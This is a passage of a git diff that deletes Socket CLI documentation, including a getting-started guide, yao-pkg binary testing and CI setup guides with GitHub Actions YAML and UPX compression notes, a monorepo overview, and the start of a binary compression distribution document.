`/packages/cli/.claude/python-dlx-refactor-plan.md` to GitHub Issue #xxx -3. **Fix** broken reference to `build-toolchain-setup.md` in `docs/build/README.md` - -### Short Term (This Sprint) -1. Consolidate performance documentation (save 500+ lines) -2. Consolidate configuration documentation (save 200+ lines) -3. Add missing README indexes to package docs (yoga-layout/research, etc.) - -### Medium Term (Next Sprint) -1. Consolidate Node.js build documentation -2. Improve test documentation organization -3. Consolidate build architecture documentation (requires team discussion) - -### Metrics to Track -- Total documentation lines (target: <10,000) -- Number of .md files (target: <80 across project) -- Average file size (target: <150 lines for most files) -- Cross-reference validity (target: 100%) - ---- - -## APPENDIX: FILE ORGANIZATION STRUCTURE - -### Current State -``` -docs/ (412 KB, 12,862 lines) -├── README.md (index) -├── documentation-organization.md (3-tier guide) -├── architecture/ -│ ├── bootstrap-stub.md (650 lines) -│ ├── repository.md (537 lines) -│ ├── stub-execution.md (438 lines) -│ ├── stub-package.md (389 lines) -│ └── unified-binary.md -├── build/ (8 files, 1,640 lines dedicated to Node) -├── configuration/ (3 files, unclear structure) -├── development/ (4 files) -├── guides/ (2 files) -├── performance/ (3 files, 1,345 lines, high redundancy) -├── technical/ (5 files, 1 deprecated) -└── testing/ (3 files) -``` - -### Proposed Future State -``` -docs/ (estimate: 9,000-10,500 lines, 25-30% reduction) -├── README.md (index) -├── documentation-organization.md (3-tier guide) -├── architecture/ -│ ├── stub-system-overview.md (900-1,000 lines - consolidated) -│ └── stub-deep-dive.md (400-500 lines - consolidated) -├── build/ -│ ├── README.md -│ ├── build-dist-structure.md -│ ├── caching-strategy.md -│ ├── node-build-system.md (1,000-1,200 lines - consolidated) -│ ├── node-build-quick-reference.md (keep) -│ └── wasm-build-guide.md -├── configuration/ -│ ├── configuration-guide.md (600-700 lines - consolidated) -│ └── [migration subsection] -├── development/ (unchanged) -├── guides/ (unchanged) -├── performance/ -│ └── performance-optimization-guide.md (700-850 lines - consolidated) -├── technical/ -│ ├── manifest-management.md -│ ├── manifest-extensions.md -│ ├── metadata-files.md -│ └── patch-cacache.md -└── testing/ (slightly reorganized) -``` - ---- - -END OF AUDIT REPORT diff --git a/docs/getting-started.md b/docs/getting-started.md deleted file mode 100644 index 6c3440ea6..000000000 --- a/docs/getting-started.md +++ /dev/null @@ -1,323 +0,0 @@ -# Getting Started - -**Quick start guide** — Get started with Socket CLI development in 10 minutes. - ---- - -## 📋 Prerequisites - -``` -Required: - ✓ Node.js 20+ (LTS recommended) - ✓ pnpm 9+ - ✓ Git - ✓ Socket.dev API key - -Optional (for binary builds): - ✓ Python 3.11+ (for SEA builds) - ✓ Docker (for cross-platform builds) -``` - ---- - -## 🚀 Quick Start - -### 1. Clone & Setup - -```bash -# Clone -git clone https://github.com/SocketDev/socket-cli.git -cd socket-cli - -# Install & verify -pnpm install -pnpm test -``` - -**This is a monorepo** with multiple packages! - ---- - -### 2. Monorepo Structure - -``` -socket-cli/ -├── packages/ -│ ├── cli/ # Main CLI package (@socketsecurity/cli) -│ │ ├── src/ -│ │ │ ├── commands/ # CLI commands (scan, install, etc.) -│ │ │ ├── utils/ # Utilities -│ │ │ └── index.mts # Entry point -│ │ └── test/ -│ │ -│ ├── bootstrap/ # CLI bootstrapper -│ ├── cli-with-sentry/ # Sentry integration -│ ├── socket/ # Published npm package wrapper -│ ├── node-sea-builder/ # Single Executable Application builder -│ ├── node-smol-builder/ # Optimized Node.js binary builder -│ └── sbom-generator/ # SBOM generation utilities -│ -├── scripts/ # Build and dev scripts -├── docs/ # Extensive documentation -│ ├── architecture/ # System architecture -│ ├── build/ # Build system docs -│ ├── development/ # Developer guides -│ ├── node-smol-builder/ # Binary optimization -│ └── ... -│ -└── pnpm-workspace.yaml # Monorepo configuration -``` - ---- - -### 3. Essential Commands - -```bash -# Development -pnpm run dev # Watch mode (all packages) -pnpm build # Build all packages - -# Testing -pnpm test # Run all tests -pnpm test:unit # Unit tests only -pnpm test:integration # Integration tests -pnpm run cover:all # Coverage for all packages - -# Working with specific packages -pnpm --filter @socketsecurity/cli test # Test CLI package only -pnpm --filter socket build # Build socket package only - -# Quality -pnpm run check # Type check + lint all packages -pnpm run lint # Lint all packages -pnpm run fix # Auto-fix issues - -# Binary builds (advanced) -pnpm run build:sea # Build Single Executable Application -pnpm run build:smol # Build optimized Node.js binary -``` - ---- - -## 🎯 Key Packages - -### @socketsecurity/cli (packages/cli/) - -**The main CLI implementation** - -- All CLI commands (`socket scan`, `socket install`, etc.) -- Interactive console features -- Package manager integrations (npm, pnpm, yarn, bun) - -### socket (packages/socket/) - -**Published npm package** - -- Wraps @socketsecurity/cli -- Handles installation and updates -- The package users actually `npm install -g socket` - -### node-smol-builder (packages/node-smol-builder/) - -**Optimized Node.js binary builder** - -- Creates ~35MB Node.js binaries (vs 60MB+ standard) -- V8 Lite mode, ICU removal, SEA removal -- Custom patches for Windows, macOS, Linux - -See [docs/node-smol-builder/](./node-smol-builder/) for details. - ---- - -## 💡 Development Workflow - -### Making Changes to CLI - -``` -1. Branch → git checkout -b feature/my-change -2. Navigate → cd packages/cli -3. Implement → Edit src/commands/ or src/utils/ -4. Test → pnpm test (in packages/cli/) -5. Verify → pnpm run fix && pnpm test (from root) -6. Commit → Conventional commits -7. PR → Submit pull request -``` - -### Adding New Commands - -```typescript -// packages/cli/src/commands/my-command/index.mts -export async function handleMyCommand(argv, ctx) { - // Command implementation -} - -// packages/cli/src/commands/my-command/cli.mts -export const cliConfig = { - command: 'my-command', - description: 'Does something awesome', - // ... command configuration -} -``` - -See [docs/development/](./development/) for detailed patterns. - ---- - -## 🔑 API Key Setup - -```bash -# .env file -SOCKET_SECURITY_API_KEY=your-api-key-here - -# Or configure via CLI -socket config set apiKey your-api-key-here -``` - -Get your API key at [socket.dev/settings/api-keys](https://socket.dev/settings/api-keys) - ---- - -## 📚 Key Concepts - -### 1. Monorepo Workflow - -Use pnpm workspaces for package management: - -```bash -# Run command in specific package -pnpm --filter @socketsecurity/cli test - -# Run command in all packages -pnpm -r test -``` - -### 2. Package Manager Integrations - -CLI supports npm, pnpm, yarn, and bun: - -```typescript -import { detectPackageManager } from '@socketsecurity/cli/utils/pm' - -const pm = await detectPackageManager(cwd) -// 'npm' | 'pnpm' | 'yarn' | 'bun' -``` - -### 3. Interactive Console - -Built with Ink (React for CLI): - -```typescript -// packages/cli/src/commands/console/InteractiveConsoleApp.tsx -import { Text, Box } from 'ink' - -export function InteractiveConsoleApp() { - return ( - - Interactive console - - ) -} -``` - -### 4. Binary Distribution - -The CLI can be distributed as: -- npm package (standard) -- Single Executable Application (SEA) -- Optimized Node.js binary (smol) - -Each has different build processes. See [docs/build/](./build/). - ---- - -## 🧪 Testing - -### Unit Tests - -```bash -# All unit tests -pnpm test:unit - -# Specific package -pnpm --filter @socketsecurity/cli test:unit -``` - -### Integration Tests - -```bash -# All integration tests (requires API key) -pnpm test:integration - -# Specific test file -pnpm test test/integration/commands/scan.test.mts -``` - -### Coverage - -```bash -# Coverage for all packages -pnpm run cover:all - -# Coverage for CLI package only -pnpm --filter @socketsecurity/cli run test:unit:coverage -``` - ---- - -## 📖 Documentation Structure - -Socket CLI has **extensive documentation**: - -``` -docs/ -├── architecture/ # System design, bootstrap flow -├── build/ # Build processes, WASM, patches -├── configuration/ # Config management -├── development/ # Setup, linking, platform support -├── node-smol-builder/ # Binary optimization details -├── sbom-generator/ # SBOM generation -├── testing/ # Test strategies -└── yoga-layout/ # Terminal layout engine -``` - -**Start with:** -1. [docs/development/getting-started.md](./development/getting-started.md) - Dev setup -2. [docs/architecture/](./architecture/) - How it all works -3. [docs/build/](./build/) - Build system deep dive - ---- - -## 🆘 Getting Help - -- **Issues:** [GitHub Issues](https://github.com/SocketDev/socket-cli/issues) -- **Discussions:** Ask in PR comments -- **Standards:** [CLAUDE.md](../CLAUDE.md) for conventions -- **Docs:** Extensive docs in [docs/](.) - ---- - -## ✅ Checklist - -- [ ] Installed dependencies (`pnpm install` from root) -- [ ] Tests passing (`pnpm test`) -- [ ] Set up API key -- [ ] Read [docs/development/getting-started.md](./development/getting-started.md) -- [ ] Understand monorepo structure -- [ ] Know pnpm workspace commands -- [ ] Understand commit format (conventional commits) -- [ ] Explored [docs/](.) for relevant guides -- [ ] Ready to contribute! - -**Welcome to Socket CLI!** 🎉 - ---- - -## 🚀 Advanced Topics - -Once you're comfortable with basics: - -- **Binary Builds:** [docs/build/](./build/) - SEA and smol builds -- **Node Patches:** [docs/node-smol-builder/patches.md](./node-smol-builder/patches.md) -- **Performance:** [docs/node-smol-builder/performance.md](./node-smol-builder/performance.md) -- **WASM Integration:** [docs/build/wasm-integration.md](./build/wasm-integration.md) -- **NLP Features:** [docs/cli/nlp-context-optimization.md](./cli/nlp-context-optimization.md) diff --git a/docs/guides/testing-yao-pkg.md b/docs/guides/testing-yao-pkg.md deleted file mode 100644 index 844b6b2fb..000000000 --- a/docs/guides/testing-yao-pkg.md +++ /dev/null @@ -1,278 +0,0 @@ -# Testing yao-pkg Binary Against Unit Tests - -This guide explains how to build and test the yao-pkg binary locally. - -## Prerequisites - -- macOS (for building Mac binaries) -- Xcode Command Line Tools: `xcode-select --install` -- Build tools: gcc, g++, make, python3 -- ~20GB free disk space for Node.js build -- 30-60 minutes for initial Node.js build - -## Quick Start (If Node Binary Already Built) - -If you already have `.custom-node-build/node-yao-pkg/out/Release/node`: - -```bash -# 1. Install dependencies -pnpm install - -# 2. Build CLI distribution -pnpm run build - -# 3. Build yao-pkg binary -pnpm exec pkg . - -# 4. Enable binary testing in .env.test -# Uncomment this line: -SOCKET_CLI_BIN_PATH="./pkg-binaries/socket-macos-arm64" - -# 5. Run tests -pnpm test -``` - -## Full Build From Scratch - -### Step 1: Install Dependencies - -```bash -pnpm install -``` - -This installs `@yao-pkg/pkg@6.8.0` and all other dependencies. - -### Step 2: Build CLI Distribution - -```bash -pnpm run build -``` - -This creates `dist/cli.js` which yao-pkg will bundle. - -**Output:** -- `dist/cli.js` - Main CLI entry (bundled, ~10-15MB) - -### Step 3: Build Custom Node Binary (One-Time, ~30-60 min) - -```bash -node scripts/build-yao-pkg-node.mjs -``` - -This downloads Node.js v24.9.0 source, applies yao-pkg patches, and builds the custom Node binary. - -**Output:** -- `.custom-node-build/node-yao-pkg/out/Release/node` (~83MB) -- Total build artifacts: ~19-20GB - -**Note:** This is a one-time build. Once built, you can reuse it for all future yao-pkg builds. - -### Step 4: Build yao-pkg Binary - -```bash -pnpm exec pkg . -``` - -This uses `pkg.json` configuration to: -1. Read `dist/cli.js` entry point -2. Use custom Node from `.custom-node-build/node-yao-pkg/out/Release/node` -3. Bundle as V8 bytecode -4. Embed assets in virtual filesystem -5. Create standalone executable - -**Output:** -- `pkg-binaries/socket-macos-arm64` (~90-110MB) - -**Time:** ~30 seconds - -### Step 5: Configure Tests to Use Binary - -Edit `.env.test` and uncomment the `SOCKET_CLI_BIN_PATH` line: - -```bash -# Before: -# SOCKET_CLI_BIN_PATH="./pkg-binaries/socket-macos-arm64" - -# After: -SOCKET_CLI_BIN_PATH="./pkg-binaries/socket-macos-arm64" -``` - -**What this does:** -- Tests will use `constants.binCliPath` which reads from `SOCKET_CLI_BIN_PATH` -- Instead of running `bin/cli.js`, tests run the yao-pkg binary -- The binary uses `SOCKET_CLI_JS_PATH="./dist/cli.js"` for local code (not downloading from npm) - -### Step 6: Run Tests - -```bash -pnpm test -``` - -Tests will now run against the yao-pkg binary instead of the Node.js script. - -## Testing Workflow Summary - -```bash -# One-time setup (if Node binary doesn't exist) -node scripts/build-yao-pkg-node.mjs # 30-60 min - -# Regular workflow -pnpm run build # Build dist/cli.js -pnpm exec pkg . # Build yao-pkg binary -# Uncomment SOCKET_CLI_BIN_PATH in .env.test -pnpm test # Run tests -``` - -## Environment Variables - -### SOCKET_CLI_JS_PATH - -**Purpose:** Points to local @socketsecurity/cli JS dist -**Default:** `./dist/cli.js` -**Used by:** Stub binaries (SEA, yao-pkg) to load local code instead of downloading from npm -**Location:** `.env.test` (always enabled) - -### SOCKET_CLI_BIN_PATH - -**Purpose:** Points to built binary to test -**Default:** Commented out (tests use `bin/cli.js`) -**Options:** -- `./pkg-binaries/socket-macos-arm64` - yao-pkg binary -- `./dist/sea/socket-macos-arm64` - SEA binary - -**Used by:** `constants.binCliPath` getter, which is passed to `spawnSocketCli()` in tests -**Location:** `.env.test` (commented out by default) - -**How it works:** -1. Tests call `spawnSocketCli(constants.binCliPath, args)` -2. `constants.binCliPath` reads from `SOCKET_CLI_BIN_PATH` env var (if set) -3. `spawnSocketCli()` detects if path is a JS file or binary: - - **JS files** (`.js`, `.mjs`, `.cjs`): Runs `node ` - - **Binaries** (no extension): Executes ` ` directly - -## File Locations - -``` -socket-cli/ -├── bin/cli.js # Thin wrapper (development) -├── dist/cli.js # Bundled CLI code (rollup output) -├── pkg-binaries/socket-macos-arm64 # yao-pkg binary (testing target) -├── .custom-node-build/ -│ └── node-yao-pkg/out/Release/node # Custom Node binary -├── .env.test # Test configuration -│ ├── SOCKET_CLI_JS_PATH="./dist/cli.js" # Always enabled -│ └── SOCKET_CLI_BIN_PATH=... # Commented out by default -└── test/**/*.test.mts # Unit tests -``` - -## Switching Between Test Modes - -### Test Against Development CLI (Default) - -```bash -# In .env.test, comment out SOCKET_CLI_BIN_PATH: -# SOCKET_CLI_BIN_PATH="./pkg-binaries/socket-macos-arm64" - -pnpm test -``` - -Tests use `bin/cli.js` → `dist/cli.js` - -### Test Against yao-pkg Binary - -```bash -# In .env.test, uncomment SOCKET_CLI_BIN_PATH: -SOCKET_CLI_BIN_PATH="./pkg-binaries/socket-macos-arm64" - -pnpm test -``` - -Tests use `pkg-binaries/socket-macos-arm64` directly - -### Test Against SEA Binary - -```bash -# In .env.test, use SEA path: -SOCKET_CLI_BIN_PATH="./dist/sea/socket-macos-arm64" - -pnpm test -``` - -Tests use `dist/sea/socket-macos-arm64` directly - -## Troubleshooting - -### "Cannot find module 'dist/cli.js'" - -**Solution:** Build the CLI first: -```bash -pnpm run build -``` - -### "Custom Node binary not found" - -**Error:** `pkg.json` references `.custom-node-build/node-yao-pkg/out/Release/node` but it doesn't exist. - -**Solution:** Build the custom Node binary: -```bash -node scripts/build-yao-pkg-node.mjs -``` - -### "pkg-binaries/socket-macos-arm64: No such file" - -**Solution:** Build the yao-pkg binary: -```bash -pnpm exec pkg . -``` - -### Tests fail with yao-pkg binary - -**Debug:** -```bash -# Test the binary directly -./pkg-binaries/socket-macos-arm64 --version - -# Check if it's loading local dist -# Should NOT download from npm -./pkg-binaries/socket-macos-arm64 --help -``` - -### Binary is too large (>200MB) - -**Expected size:** 90-110MB - -**Possible cause:** Debug symbols included - -**Solution:** Ensure custom Node was built with optimizations (build-yao-pkg-node.mjs handles this automatically) - -## CI/CD Integration - -For GitHub Actions, cache the custom Node binary to avoid rebuilding: - -```yaml -- name: Cache custom Node binary - uses: actions/cache@v4 - with: - path: .custom-node-build/node-yao-pkg - key: node-yao-pkg-v24.9.0-${{ runner.os }}-${{ runner.arch }} - -- name: Build custom Node if not cached - if: steps.cache-node.outputs.cache-hit != 'true' - run: node scripts/build-yao-pkg-node.mjs - -- name: Build yao-pkg binary - run: | - pnpm run build - pnpm exec pkg . - -- name: Test yao-pkg binary - env: - SOCKET_CLI_BIN_PATH: ./pkg-binaries/socket-macos-arm64 - run: pnpm test -``` - -## See Also - -- [YAO_PKG_BUILD.md](./YAO_PKG_BUILD.md) - Complete yao-pkg build documentation -- [REPOSITORY_STRUCTURE.md](./REPOSITORY_STRUCTURE.md) - Directory structure and build artifacts -- [PKG_PLATFORM_SUPPORT.md](./PKG_PLATFORM_SUPPORT.md) - Platform-specific considerations diff --git a/docs/guides/yao-pkg-ci.md b/docs/guides/yao-pkg-ci.md deleted file mode 100644 index 94bfbc30b..000000000 --- a/docs/guides/yao-pkg-ci.md +++ /dev/null @@ -1,483 +0,0 @@ -# CI Setup for yao-pkg Binary Builds - -This document covers setting up Continuous Integration (CI) for building Socket CLI yao-pkg binaries across multiple platforms. - -## Overview - -Building yao-pkg binaries in CI requires: -1. **Platform-specific runners** (macOS, Linux, Windows) -2. **Build tools** (compilers, make, python) -3. **UPX** (optional, for compression on Linux/Windows) -4. **Node.js** v22+ (for building Socket CLI) -5. **pnpm** v9+ -6. **~10GB disk space** per platform -7. **30-60 minutes** build time per platform - -## GitHub Actions Setup - -### Matrix Strategy - -Use a matrix strategy to build for multiple platforms: - -```yaml -name: Build yao-pkg Binaries - -on: - push: - branches: [main] - release: - types: [created] - -jobs: - build-node: - name: Build Custom Node.js - runs-on: ${{ matrix.os }} - strategy: - matrix: - include: - - os: macos-13 - target: macos-arm64 - node_arch: arm64 - - os: macos-13 - target: macos-x64 - node_arch: x64 - - os: ubuntu-latest - target: linux-x64 - node_arch: x64 - - os: ubuntu-latest - target: linux-arm64 - node_arch: arm64 - - os: windows-latest - target: win-x64 - node_arch: x64 - - steps: - - name: Checkout code - uses: actions/checkout@v4 - - - name: Setup Node.js - uses: actions/setup-node@v4 - with: - node-version: '22' - - - name: Install pnpm - uses: pnpm/action-setup@v2 - with: - version: 9 - - - name: Install dependencies - run: pnpm install --frozen-lockfile - - - name: Install build tools (Linux) - if: runner.os == 'Linux' - run: | - sudo apt-get update - sudo apt-get install -y build-essential python3 upx-ucl - - - name: Install build tools (macOS) - if: runner.os == 'macOS' - run: | - # Xcode Command Line Tools are pre-installed - # UPX not needed on macOS (code signing incompatible) - echo "Build tools ready" - - - name: Install build tools (Windows) - if: runner.os == 'Windows' - run: | - choco install upx -y - - - name: Build custom Node.js - run: pnpm run build:yao-pkg:node - env: - TARGET_ARCH: ${{ matrix.node_arch }} - - - name: Upload Node.js binary - uses: actions/upload-artifact@v4 - with: - name: node-${{ matrix.target }} - path: .custom-node-build/node-yao-pkg/out/Release/node - retention-days: 7 - - build-cli: - name: Build CLI Binary - needs: build-node - runs-on: ${{ matrix.os }} - strategy: - matrix: - include: - - os: macos-13 - target: macos-arm64 - - os: macos-13 - target: macos-x64 - - os: ubuntu-latest - target: linux-x64 - - os: ubuntu-latest - target: linux-arm64 - - os: windows-latest - target: win-x64 - - steps: - - name: Checkout code - uses: actions/checkout@v4 - - - name: Setup Node.js - uses: actions/setup-node@v4 - with: - node-version: '22' - - - name: Install pnpm - uses: pnpm/action-setup@v2 - with: - version: 9 - - - name: Install dependencies - run: pnpm install --frozen-lockfile - - - name: Download Node.js binary - uses: actions/download-artifact@v4 - with: - name: node-${{ matrix.target }} - path: .custom-node-build/node-yao-pkg/out/Release/ - - - name: Build CLI distribution - run: pnpm run build:cli - - - name: Build pkg binary - run: pnpm run build:yao-pkg - - - name: Upload CLI binary - uses: actions/upload-artifact@v4 - with: - name: socket-${{ matrix.target }} - path: pkg-binaries/socket-* - retention-days: 30 -``` - -## Platform-Specific Setup - -### macOS - -**Pre-installed on GitHub Actions:** -- ✅ Xcode Command Line Tools -- ✅ Build essentials (clang, make, python3) - -**Additional setup:** -```bash -# No additional setup needed -# UPX is not used on macOS (incompatible with code signing) -``` - -**Notes:** -- Ad-hoc code signing is automatic in build script -- For distribution, use Developer ID certificate via secrets - -### Linux (Ubuntu/Debian) - -**Install build tools:** -```bash -sudo apt-get update -sudo apt-get install -y \ - build-essential \ - python3 \ - python3-pip \ - upx-ucl -``` - -**Notes:** -- `build-essential` includes gcc, g++, make -- `upx-ucl` is the official UPX package -- UPX will compress binary by ~30-50% - -### Linux (RHEL/Fedora/CentOS) - -**Install build tools:** -```bash -sudo dnf install -y \ - gcc \ - gcc-c++ \ - make \ - python3 \ - upx -``` - -### Windows - -**Install build tools via Chocolatey:** -```powershell -choco install -y visualstudio2022buildtools -choco install -y upx -``` - -**Or use WSL2 (recommended):** -```bash -# Use Ubuntu setup from above -wsl --install -d Ubuntu -``` - -**Notes:** -- Visual Studio Build Tools required for node-gyp -- UPX provides ~30-50% compression -- WSL2 is recommended for consistent builds - -## UPX Compression - -### What is UPX? - -UPX (Ultimate Packer for eXecutables) is a free executable compressor that: -- Reduces binary size by 30-50% (typical) -- Decompresses automatically at runtime (~50ms overhead) -- Works on Linux, Windows (not used on macOS due to code signing) - -### Installation by Platform - -**Ubuntu/Debian:** -```bash -sudo apt-get install upx-ucl -``` - -**RHEL/Fedora/CentOS:** -```bash -sudo dnf install upx -``` - -**macOS (not recommended):** -```bash -# UPX is available but incompatible with code signing -# brew install upx -``` - -**Windows:** -```powershell -choco install upx -``` - -**Manual installation:** -- Download from: https://upx.github.io/ -- Extract to PATH or `/usr/local/bin` - -### Verifying UPX Installation - -```bash -upx --version -# Output: upx 4.2.1 - -which upx -# Output: /usr/bin/upx (or similar) -``` - -### Build Script Behavior - -The `scripts/build-yao-pkg-node.mjs` script: -- ✅ **Attempts UPX** on Linux/Windows -- ✅ **Skips gracefully** if UPX not found -- ✅ **Never fails** the build -- ✅ **Logs warning** if UPX unavailable - -```javascript -if (!IS_MACOS) { - try { - await exec('upx', ['--best', '--lzma', nodeBinary]) - console.log('✅ UPX compression complete') - } catch (error) { - console.log('⚠️ UPX not available, skipping compression') - } -} -``` - -### Expected Binary Sizes - -| Platform | Unoptimized | Stripped | UPX Compressed | -|----------|-------------|----------|----------------| -| macOS ARM64 | ~95MB | ~44MB | N/A (code signed) | -| macOS x64 | ~95MB | ~44MB | N/A (code signed) | -| Linux x64 | ~95MB | ~44MB | ~22-31MB | -| Linux ARM64 | ~95MB | ~44MB | ~22-31MB | -| Windows x64 | ~95MB | ~44MB | ~22-31MB | - -## Caching Strategies - -### Cache Node.js Source - -Cache the Node.js source to avoid re-downloading: - -```yaml -- name: Cache Node.js source - uses: actions/cache@v4 - with: - path: .custom-node-build/node-yao-pkg - key: node-source-v24.10.0-${{ runner.os }}-${{ runner.arch }} -``` - -### Cache Node.js Build - -Cache the compiled Node.js binary to avoid rebuilding: - -```yaml -- name: Cache Node.js build - uses: actions/cache@v4 - with: - path: .custom-node-build/node-yao-pkg/out/Release/node - key: node-binary-v24.10.0-${{ runner.os }}-${{ runner.arch }}-${{ hashFiles('scripts/build-yao-pkg-node.mjs') }} -``` - -### Cache pnpm Store - -Cache pnpm dependencies: - -```yaml -- name: Get pnpm store directory - shell: bash - run: echo "STORE_PATH=$(pnpm store path --silent)" >> $GITHUB_ENV - -- name: Cache pnpm store - uses: actions/cache@v4 - with: - path: ${{ env.STORE_PATH }} - key: pnpm-${{ runner.os }}-${{ hashFiles('pnpm-lock.yaml') }} - restore-keys: | - pnpm-${{ runner.os }}- -``` - -## Storage and Distribution - -### Artifact Upload - -Upload binaries as artifacts: - -```yaml -- name: Upload binary - uses: actions/upload-artifact@v4 - with: - name: socket-${{ matrix.target }} - path: pkg-binaries/socket-* - retention-days: 30 -``` - -### Release Assets - -Attach binaries to GitHub releases: - -```yaml -- name: Upload to release - if: github.event_name == 'release' - uses: actions/upload-release-asset@v1 - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - with: - upload_url: ${{ github.event.release.upload_url }} - asset_path: ./pkg-binaries/socket-${{ matrix.target }} - asset_name: socket-${{ matrix.target }} - asset_content_type: application/octet-stream -``` - -## Environment Variables - -### Build Configuration - -```bash -# Target architecture (for cross-compilation) -export TARGET_ARCH=arm64 # or x64 - -# Skip UPX compression (for testing) -export SKIP_UPX=1 - -# PKG_EXECPATH (for testing patched Node.js) -export PKG_EXECPATH=PKG_INVOKE_NODEJS -``` - -### GitHub Secrets (Optional) - -For signed macOS releases: - -```yaml -env: - APPLE_CERTIFICATE_BASE64: ${{ secrets.APPLE_CERTIFICATE_BASE64 }} - APPLE_CERTIFICATE_PASSWORD: ${{ secrets.APPLE_CERTIFICATE_PASSWORD }} - APPLE_KEYCHAIN_PASSWORD: ${{ secrets.APPLE_KEYCHAIN_PASSWORD }} -``` - -## Troubleshooting - -### UPX Not Found - -**Symptom:** -``` -⚠️ UPX not available or failed, skipping compression -``` - -**Solution:** -- Install UPX via package manager (see above) -- Verify with `upx --version` -- Check PATH includes UPX location -- Build continues without compression (larger binary) - -### Node.js Build Timeout - -**Symptom:** -``` -Error: The operation was canceled. -``` - -**Solution:** -- Increase timeout in workflow: - ```yaml - timeout-minutes: 90 - ``` -- Use cached build artifacts -- Split build into separate jobs - -### Disk Space Issues - -**Symptom:** -``` -No space left on device -``` - -**Solution:** -- Clean up before build: - ```bash - df -h - sudo apt-get clean - docker system prune -af - ``` -- Use larger runner (GitHub Actions: `ubuntu-latest-8-cores`) - -### Code Signing Fails (macOS) - -**Symptom:** -``` -Error: codesign failed with exit code 1 -``` - -**Solution:** -- Verify Xcode Command Line Tools: `xcode-select --version` -- For ad-hoc signing, use `codesign --sign -` -- For distribution, provide valid certificate - -## Performance Tips - -1. **Parallel builds**: Build different platforms in parallel jobs -2. **Cache aggressively**: Cache Node.js source, build, and pnpm store -3. **Artifact compression**: GitHub automatically compresses artifacts -4. **Matrix strategy**: Use `fail-fast: false` to continue other builds if one fails -5. **Separate jobs**: Split Node.js build and pkg build into separate jobs - -## Cost Optimization - -For self-hosted runners: -- **Reuse runners**: Keep runners warm between builds -- **Local cache**: Persistent cache for Node.js source/builds -- **Incremental builds**: Only rebuild when patches change - -For GitHub Actions: -- **Cache everything**: Reduces build time and GitHub Actions minutes -- **On-demand builds**: Only build on release tags -- **Manual triggers**: Use `workflow_dispatch` for testing - -## References - -- [UPX Official Site](https://upx.github.io/) -- [GitHub Actions: actions/upload-artifact](https://github.com/actions/upload-artifact) -- [GitHub Actions: actions/cache](https://github.com/actions/cache) -- [yao-pkg Documentation](https://github.com/yao-pkg/pkg) -- Socket CLI: `docs/YAO_PKG_BUILD.md` diff --git a/docs/monorepo.md b/docs/monorepo.md deleted file mode 100644 index e0ef6bd5c..000000000 --- a/docs/monorepo.md +++ /dev/null @@ -1,71 +0,0 @@ -# Socket CLI Monorepo Guide - -This document explains the monorepo structure and how the different packages relate to each other. - -## Package Overview - -### Three Release Builds - -Socket CLI releases three distinct npm packages: - -1. **`@socketsecurity/cli`** - Full JavaScript CLI implementation -2. **`@socketsecurity/cli-with-sentry`** - Full JavaScript CLI with Sentry telemetry -3. **`socket`** - Thin wrapper that downloads `@socketsecurity/cli` on demand - -### Platform Binary Packages (8 total) - -Optional platform-specific native binaries: - -- `@socketbin/cli-darwin-arm64` - macOS Apple Silicon -- `@socketbin/cli-darwin-x64` - macOS Intel -- `@socketbin/cli-linux-arm64` - Linux ARM64 (glibc) -- `@socketbin/cli-linux-x64` - Linux x64 (glibc) -- `@socketbin/cli-alpine-arm64` - Alpine Linux ARM64 (musl) -- `@socketbin/cli-alpine-x64` - Alpine Linux x64 (musl) -- `@socketbin/cli-win32-arm64` - Windows ARM64 -- `@socketbin/cli-win32-x64` - Windows x64 - -### Private Build Tools (2 total) - -- `@socketbin/node-smol-builder-builder` - Builds custom Node.js from source with Socket patches -- `@socketbin/node-sea-builder-builder` - Builds Socket CLI as native Node.js SEA binaries (fallback) - -## Directory Structure - -``` -socket-cli/ -├── packages/ -│ ├── cli/ # @socketsecurity/cli -│ │ ├── src/ # CLI source code -│ │ ├── bin/ # CLI entry points -│ │ ├── test/ # Tests -│ │ ├── data/ # Static data -│ │ └── package.json -│ │ -│ ├── socket/ # socket (thin wrapper) -│ │ ├── bin/ -│ │ │ ├── socket.js # Entry point -│ │ │ └── bootstrap.js # Bootstrap logic -│ │ └── package.json -│ │ -│ ├── socketbin-custom-node-from-source/ # Custom Node.js builder -│ │ ├── build/ -│ │ │ ├── patches/ # Socket security patches -│ │ │ └── additions/ # Additional C++ code -│ │ ├── scripts/ -│ │ │ └── build.mjs # Build script -│ │ └── package.json -│ │ -│ ├── socketbin-native-node-sea-builder/ # SEA builder -│ │ ├── scripts/ -│ │ │ ├── build.mjs # SEA build script -│ │ │ └── publish.mjs # Publish script -│ │ └── package.json -│ │ -│ └── socketbin-cli-{platform}-{arch}/ # 8 platform packages -│ ├── bin/ -│ │ └── socket (or socket.exe) # Native binary -│ └── package.json -│ -├── pnpm-workspace.yaml # pnpm workspace config -└── package.json # Root workspace \ No newline at end of file diff --git a/docs/node-smol-builder/binary-compression-distribution.md b/docs/node-smol-builder/binary-compression-distribution.md deleted file mode 100644 index 8329337b0..000000000 --- a/docs/node-smol-builder/binary-compression-distribution.md +++ /dev/null @@ -1,505 +0,0 @@ -# Binary Compression Distribution Strategy - -## Overview - -Socket CLI uses platform-specific binary compression to reduce distribution size while maintaining code signing compatibility. This document explains the distribution architecture and how the decompression tools work. - -## Architecture - -### Compression Flow - -``` -Build → Strip → Sign → Compress → Bundle with Decompressor → Distribute -``` - -**Critical Order:** -1. **Strip** debug symbols (44 MB → 23-27 MB) -2. **Sign** binary (macOS ARM64) -3. **Compress** signed binary (23-27 MB → 10-12 MB) -4. **Re-sign** compressed wrapper (macOS ARM64) -5. **Bundle** decompression tool alongside compressed binary - -### Distribution Package Structure - -``` -build/out/Compressed/ -├── node # Compressed Node.js binary (10-12 MB) -└── socket_macho_decompress # Decompression tool (86 KB) - (or socket_elf_decompress / socket_pe_decompress.exe) -``` - -**Total distribution size:** ~10-12 MB + 86 KB = **~10-12 MB** - -## Decompression Tool Architecture - -### What It Is - -The decompression tool is a **standalone executable** that: -- Takes a compressed binary as input -- Decompresses to memory (or temporary file) -- Executes the decompressed binary -- Acts as a transparent wrapper/launcher - -### What It's NOT - -- ❌ NOT built into the compressed binary -- ❌ NOT a package manager -- ❌ NOT a separate npm package -- ❌ NOT extracted to user's system permanently - -### How It Works - -```bash -# User runs: -./socket_macho_decompress ./node --version - -# What happens internally: -1. Read compressed binary (node) -2. Decompress to memory/tmpfs using platform API -3. Verify decompressed binary signature (macOS) -4. Execute decompressed binary with args (--version) -5. Clean up temporary data -6. Exit with same code as Node.js -``` - -## 